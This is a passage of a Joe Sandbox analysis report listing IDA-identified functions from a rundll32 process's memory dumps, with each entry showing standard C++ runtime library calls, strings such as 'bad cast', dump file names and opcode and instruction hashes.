_CxxThrowException.LIBCMT ref: 000001E51ADF3A55
std::_Facet_Register.LIBCPMT ref: 000001E51ADF3A73
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3A7E

Strings

bad cast, xrefs: 000001E51ADF3A38

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 560648410-3145022300
Opcode ID: 8e39b244ec004d33a78bec66716c19fd785043de6809f57852e2fe2761deb095
Instruction ID: 0fede1db7a1e3090302a7af53907c3853671e20e77429abb00c2bc3bacc43f4e
Opcode Fuzzy Hash: 8e39b244ec004d33a78bec66716c19fd785043de6809f57852e2fe2761deb095
Instruction Fuzzy Hash: 7A312132208F8091EB129B65E4403DE77E2F794BA8F555322DE69476EBDE38C586C700

Function 000001E51ADF2B24 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF2B45

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF2B6A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF2B94
codecvt.LIBCPMT ref: 000001E51ADF2BED
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF2C04
_CxxThrowException.LIBCMT ref: 000001E51ADF2C15
std::_Facet_Register.LIBCPMT ref: 000001E51ADF2C33
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF2C3E

Strings

bad cast, xrefs: 000001E51ADF2BF8

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockcodecvtstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 2760077954-3145022300
Opcode ID: dc53cec89c99da22bcd306d525d4bf72450f34741b04eaec344622fce76dc459
Instruction ID: fe870c8f1034e9024e723d2146cfe7126b7bea0c233255ef3e107ba95dcc7ae3
Opcode Fuzzy Hash: dc53cec89c99da22bcd306d525d4bf72450f34741b04eaec344622fce76dc459
Instruction Fuzzy Hash: 9D310032608F8091EB16DF25E4543DE67E2F794BA8F544722DE5A476EBDE38C886C700

Function 000001E51ADF3A94 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3AB5

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3ADA
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3B04
moneypunct.LIBCPMT ref: 000001E51ADF3B5D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF3B74
_CxxThrowException.LIBCMT ref: 000001E51ADF3B85
std::_Facet_Register.LIBCPMT ref: 000001E51ADF3BA3
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3BAE

Strings

bad cast, xrefs: 000001E51ADF3B68

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 560648410-3145022300
Opcode ID: cf3a473d4a2924b6d3a61fecd1b2eafc96592f01937f7426af8f1c781fe91554
Instruction ID: 5348df953f74dbb4c4a19727cae6f129171a326717bd10a936227beee2393422
Opcode Fuzzy Hash: cf3a473d4a2924b6d3a61fecd1b2eafc96592f01937f7426af8f1c781fe91554
Instruction Fuzzy Hash: 5A311E32208FC091EB129B25E8543DE67E2F794BA8F594322DE69476EBDF38C446C700

Function 000001E51ADEB560 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEB579

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

__int64.LIBCPMTD ref: 000001E51ADEB592

Part of subcall function 000001E51ADE1AF0: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADE1B0B
Part of subcall function 000001E51ADE1AF0: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADE1B3D

std::locale::_Getfacet.LIBCPMTD ref: 000001E51ADEB5A9
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEB65A

Strings

bad cast, xrefs: 000001E51ADEB5EC

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Getfacet__int64_lockstd::locale::_
String ID: bad cast
API String ID: 1666373992-3145022300
Opcode ID: 93a5699e027cb8ef89e0de3b46b91101183ef16d26cf5389666435c13f441cb5
Instruction ID: 24d5321c545d6bfd41f844bb24671c80ea006bf8688a288e86d02943324ccff0
Opcode Fuzzy Hash: 93a5699e027cb8ef89e0de3b46b91101183ef16d26cf5389666435c13f441cb5
Instruction Fuzzy Hash: 5E31D632219F8481DB61DB14E48039EB7A2F7887A8F504315EA9E47BEADF38C595CB00

Function 000001E51ADEABE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEABF9

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

__int64.LIBCPMTD ref: 000001E51ADEAC12

Part of subcall function 000001E51ADE1AF0: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADE1B0B
Part of subcall function 000001E51ADE1AF0: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADE1B3D

std::locale::_Getfacet.LIBCPMTD ref: 000001E51ADEAC29
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEACDA

Strings

bad cast, xrefs: 000001E51ADEAC6C

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Getfacet__int64_lockstd::locale::_
String ID: bad cast
API String ID: 1666373992-3145022300
Opcode ID: d78c58cc6dc32a45fa35aa0ea62847462abab04b09d4575ad04a92c308c6451f
Instruction ID: f38fef9b9f3df8af5716efe82dec84a596441c74b644ecff4774f8f730e83658
Opcode Fuzzy Hash: d78c58cc6dc32a45fa35aa0ea62847462abab04b09d4575ad04a92c308c6451f
Instruction Fuzzy Hash: 8831B636219F8581DB619B15E48039EB7A1F7C87A8F500311EA9E43BEBDF38C585CB00

Function 000001E51ADF4414 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF4435

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF445A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF4484
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF44F4
_CxxThrowException.LIBCMT ref: 000001E51ADF4505
std::_Facet_Register.LIBCPMT ref: 000001E51ADF4523
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF452E

Strings

bad cast, xrefs: 000001E51ADF44E8

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 885392049-3145022300
Opcode ID: 4ee676152d8a6d3fc2897e1a750d37abcf8e05a29651dc9c84745b4ac20e915c
Instruction ID: d9c82ac10c24bd5e8e5795c1dc745f1f22c8ef9def5e0e3bde2a8f09a550e3d9
Opcode Fuzzy Hash: 4ee676152d8a6d3fc2897e1a750d37abcf8e05a29651dc9c84745b4ac20e915c
Instruction Fuzzy Hash: 7B313072208F8081EB12DB65E5403DE67E2F794BA8F585322DE5A577EBDE78C846C700

Function 000001E51ADF4544 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF4565

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF458A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF45B4
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF4624
_CxxThrowException.LIBCMT ref: 000001E51ADF4635
std::_Facet_Register.LIBCPMT ref: 000001E51ADF4653
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF465E

Strings

bad cast, xrefs: 000001E51ADF4618

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 885392049-3145022300
Opcode ID: 61d228dc35f4783f95f4f267f4efbd83b46e62b23daaabd50ddf3d7b4201f6b8
Instruction ID: 6eafa2257de7c2ba966b0a9e4bb0febdc8e55ae4348b3b8e92eef774e0eeddb0
Opcode Fuzzy Hash: 61d228dc35f4783f95f4f267f4efbd83b46e62b23daaabd50ddf3d7b4201f6b8
Instruction Fuzzy Hash: 16314372248FC091EB12DB25E9503DE67E2E794BA8F544322DE69477EBDE38C486C700

Function 000001E51ADF42E4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF4305

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF432A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF4354
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF43C4
_CxxThrowException.LIBCMT ref: 000001E51ADF43D5
std::_Facet_Register.LIBCPMT ref: 000001E51ADF43F3
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF43FE

Strings

bad cast, xrefs: 000001E51ADF43B8

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 885392049-3145022300
Opcode ID: 9ba023ed03df909f6066c7b5c14fd05801aa9986d2c2f223f424258040ee7ccc
Instruction ID: f0178516104e068482de89b901d71a4eb93256dbd09ed36b490c413ded78c97a
Opcode Fuzzy Hash: 9ba023ed03df909f6066c7b5c14fd05801aa9986d2c2f223f424258040ee7ccc
Instruction Fuzzy Hash: C1310072298FC091EB16DB25E4503DE67E2F794BA8F544322DE59476EBDE38C886C700

Function 000001E51AE08828 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE08849

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE0886E
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE08898
std::bad_exception::bad_exception.LIBCMT ref: 000001E51AE08908
_CxxThrowException.LIBCMT ref: 000001E51AE08919
std::_Facet_Register.LIBCPMT ref: 000001E51AE08937
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE08942

Strings

bad cast, xrefs: 000001E51AE088FC

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 885392049-3145022300
Opcode ID: f8706b51eb17ae2e159a5494a8dec2db18e3578be03e998b402b1e0e9252aa95
Instruction ID: cf4b8fabb418654a01dc07700bf489c4b92b92475badee13ae1e314b9ab53d26
Opcode Fuzzy Hash: f8706b51eb17ae2e159a5494a8dec2db18e3578be03e998b402b1e0e9252aa95
Instruction Fuzzy Hash: 37314E31608F8082EB13AB25E5503DE67E3E794BA8F544321DE59476EBDE34C585C710

Function 000001E51ADF4674 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF4695

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF46BA
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF46E4
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF4754
_CxxThrowException.LIBCMT ref: 000001E51ADF4765
std::_Facet_Register.LIBCPMT ref: 000001E51ADF4783
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF478E

Strings

bad cast, xrefs: 000001E51ADF4748

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 885392049-3145022300
Opcode ID: ace5dc31f61c09f8b1992fbad1866961798bcf55ab3e40703d2c29ce2fc2ab2b
Instruction ID: 5eb98628480a0ff954441504672278d0581db0ff0ced42192bab1ca1a42fde4e
Opcode Fuzzy Hash: ace5dc31f61c09f8b1992fbad1866961798bcf55ab3e40703d2c29ce2fc2ab2b
Instruction Fuzzy Hash: CF315272608F8081FB12DB25E8403DE67E2F795BA8F584322DE59476EBDE38C486C740

Function 000001E51AE08958 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE08979

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE0899E
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE089C8
std::bad_exception::bad_exception.LIBCMT ref: 000001E51AE08A38
_CxxThrowException.LIBCMT ref: 000001E51AE08A49
std::_Facet_Register.LIBCPMT ref: 000001E51AE08A67
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE08A72

Strings

bad cast, xrefs: 000001E51AE08A2C

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 885392049-3145022300
Opcode ID: 59c119c6cd78f5f12ab19a5a93b0e181c0794a7f240d0e73d8738324ff7228fb
Instruction ID: e9f5163c72be80b21427cdf4f0100e011007279c9c4c9cdb4af06d64ad6b91ee
Opcode Fuzzy Hash: 59c119c6cd78f5f12ab19a5a93b0e181c0794a7f240d0e73d8738324ff7228fb
Instruction Fuzzy Hash: A0311932308F8086EB53AB65E5503DD67E2F794BA8F584322DE5947AEBDE35C4468700

Function 000001E5190CA988 Relevance: 12.6, APIs: 10, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 000001E5190CA9B6

Part of subcall function 000001E5190C16CC: _errno.LIBCMT ref: 000001E5190C16EC

free.LIBCMT ref: 000001E5190CA9CB
free.LIBCMT ref: 000001E5190CA9EC
free.LIBCMT ref: 000001E5190CAA01
free.LIBCMT ref: 000001E5190CAA15
free.LIBCMT ref: 000001E5190CAA21
free.LIBCMT ref: 000001E5190CAA4C
free.LIBCMT ref: 000001E5190CAA6D
free.LIBCMT ref: 000001E5190CAA86
free.LIBCMT ref: 000001E5190CAAB7

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: b4bc968d3c6e0ca3411d4d7c887ffc2f2a0207fe4ca6a95d778c9ae964d27bd5
Instruction ID: 2aeb50d900ac689e42663660248337ea74b751e1fe79ac77526c7274b666d70f
Opcode Fuzzy Hash: b4bc968d3c6e0ca3411d4d7c887ffc2f2a0207fe4ca6a95d778c9ae964d27bd5
Instruction Fuzzy Hash: AC410E74254E5A4FFB94FB58D8A5BA932F2F755319F4C049CE806C21A1CBAC88858B91

Function 000001E51AE159DF Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

__DestructExceptionObject.LIBCMT ref: 000001E51AE15A0A
RaiseException.KERNEL32 ref: 000001E51AE15A33
__DestructExceptionObject.LIBCMT ref: 000001E51AE15A94
_getptd.LIBCMT ref: 000001E51AE159E7

Part of subcall function 000001E51AE1D224: _getptd_noexit.LIBCMT ref: 000001E51AE1D22A
Part of subcall function 000001E51AE1D224: _amsg_exit.LIBCMT ref: 000001E51AE1D23A

_getptd.LIBCMT ref: 000001E51AE15A99
_getptd.LIBCMT ref: 000001E51AE15AA5

Strings

csm, xrefs: 000001E51AE15A67

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
String ID: csm
API String ID: 1037122555-1018135373
Opcode ID: f0fb30d1909b450c6e57b082ed5d02df015822f95b1b763569599858bfad4588
Instruction ID: 2662b6626f8cc5e538ae745435f85f99aff5b7b9d6b253613c23aac3f9502b16
Opcode Fuzzy Hash: f0fb30d1909b450c6e57b082ed5d02df015822f95b1b763569599858bfad4588
Instruction Fuzzy Hash: B1215076208A9186E731DB55F08039E73E1F384B69F044216DF9A0B796CB39D446CB10

Function 000001E51AE20310 Relevance: 12.2, APIs: 8, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc_crt.LIBCMT ref: 000001E51AE20339

Part of subcall function 000001E51AE16398: malloc.LIBCMT ref: 000001E51AE163C3
Part of subcall function 000001E51AE16398: Sleep.KERNEL32(?,?,?,000001E51AE14B14,?,?,?,000001E51AE14A13,?,?,00000000,000001E51AE1D332,?,?,00000000,000001E51AE1D29E), ref: 000001E51AE163D6

free.LIBCMT ref: 000001E51AE2043A
free.LIBCMT ref: 000001E51AE20456

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: free$Sleep_malloc_crtmalloc
String ID:
API String ID: 2523592665-0
Opcode ID: caada0040375c754c365269c74eac08a2c7c6ecaf5709b2b132bd05a7a63ca1e
Instruction ID: d77569c719a7df54751fb8bf3b3285b1fa3c1bf7352077391f93820ea9629730
Opcode Fuzzy Hash: caada0040375c754c365269c74eac08a2c7c6ecaf5709b2b132bd05a7a63ca1e
Instruction Fuzzy Hash: FF618132309F9093EB22DB16E95079E37E2F7847A8F444226DE4D47B92EF38C9658740

Function 000001E5190D8C44 Relevance: 10.7, APIs: 7, Instructions: 180COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001E5190D8C6F
_errno.LIBCMT ref: 000001E5190D8C64

Part of subcall function 000001E5190C33B4: _getptd_noexit.LIBCMT ref: 000001E5190C33B8

_errno.LIBCMT ref: 000001E5190D8D12
_invalid_parameter_noinfo.LIBCMT ref: 000001E5190D8D1D

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
String ID:
API String ID: 1573762532-0
Opcode ID: 54267be0af5665c456a7c7659a763348ac507c77e1cf2204fcfa820cb5cdd029
Instruction ID: bd529e62f9a7d899aa4397e24001249d7d2c887dc1719d9bb619c9d2ce012945
Opcode Fuzzy Hash: 54267be0af5665c456a7c7659a763348ac507c77e1cf2204fcfa820cb5cdd029
Instruction Fuzzy Hash: 9751FD3C514E898BEB64A719C4413FA73F2FB94319F9D015EAC8AC71D5D7349A41C286

Function 000001E51ADE8D70 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 173COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001E51ADE4C10: shared_ptr.LIBCPMTD ref: 000001E51ADE4C2B

codecvt.LIBCPMTD ref: 000001E51ADE8EDF

Strings

bad conversion, xrefs: 000001E51ADE8FCE, 000001E51ADE90A6

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: codecvtshared_ptr
String ID: bad conversion
API String ID: 864914841-2629740042
Opcode ID: f686c19bb21e7c99195cfd856166b89ac244ed319bd7e827f4bfb7f3c19f572a
Instruction ID: 1a985ca1f82125a99a93f9eb599ca88b5548a5f016bf0d1f4816f1dd5abe97ae
Opcode Fuzzy Hash: f686c19bb21e7c99195cfd856166b89ac244ed319bd7e827f4bfb7f3c19f572a
Instruction Fuzzy Hash: 51911872209EC485EB72DB15E4413DEA3A2F795788F800516EACD83BABDF79C484CB00

Function 000001E5190D262C Relevance: 10.6, APIs: 7, Instructions: 146COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001E5190D2652
_errno.LIBCMT ref: 000001E5190D2647

Part of subcall function 000001E5190C33B4: _getptd_noexit.LIBCMT ref: 000001E5190C33B8

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001E5190D26D1
_errno.LIBCMT ref: 000001E5190D26E2
_invalid_parameter_noinfo.LIBCMT ref: 000001E5190D26ED

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
String ID:
API String ID: 781512312-0
Opcode ID: 18b03093d7903f9cb9c0e6ccd3bd8cd556307edb59b32dac925bc1e85bd82eca
Instruction ID: 63057bb3e9775a2afc53709cead6b881712edd413fb99e2cc8733c9eb7068c25
Opcode Fuzzy Hash: 18b03093d7903f9cb9c0e6ccd3bd8cd556307edb59b32dac925bc1e85bd82eca
Instruction Fuzzy Hash: 6241263C414F9A4BEBA4AB1DC0447FEB3F2FB90339F9C065EAC95C71D5DA2489819681

Function 000001E51AE2939C Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001E51AE293C7
_errno.LIBCMT ref: 000001E51AE293BC

Part of subcall function 000001E51AE13B0C: _getptd_noexit.LIBCMT ref: 000001E51AE13B10

_errno.LIBCMT ref: 000001E51AE2946A
_invalid_parameter_noinfo.LIBCMT ref: 000001E51AE29475

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
String ID:
API String ID: 1573762532-0
Opcode ID: e6115aaee9bd6988ad82c43c6dd58144aeb0dd506a0ad067c6414fbe19083d80
Instruction ID: f3c6b39d136c2b79fb91cd3432b99b81d15d91764d28db9b63e3f375a79f2153
Opcode Fuzzy Hash: e6115aaee9bd6988ad82c43c6dd58144aeb0dd506a0ad067c6414fbe19083d80
Instruction Fuzzy Hash: 3F41E372A08AD581EF76AB11D5803FD73E2E740BDCF886213DE99876C7E728C9418720

Function 000001E51AE22D84 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001E51AE22DAA
_errno.LIBCMT ref: 000001E51AE22D9F

Part of subcall function 000001E51AE13B0C: _getptd_noexit.LIBCMT ref: 000001E51AE13B10

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001E51AE22E29
_errno.LIBCMT ref: 000001E51AE22E3A
_invalid_parameter_noinfo.LIBCMT ref: 000001E51AE22E45

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
String ID:
API String ID: 781512312-0
Opcode ID: dfee2ec86327835073bb60d14cfa61aec5f3f40ef22b560a8e2aa4c0f90f1485
Instruction ID: 95f8a0967e85029ee295f082f8bfb91aabb9bcc854a8c801ca7cc00d8c35636b
Opcode Fuzzy Hash: dfee2ec86327835073bb60d14cfa61aec5f3f40ef22b560a8e2aa4c0f90f1485
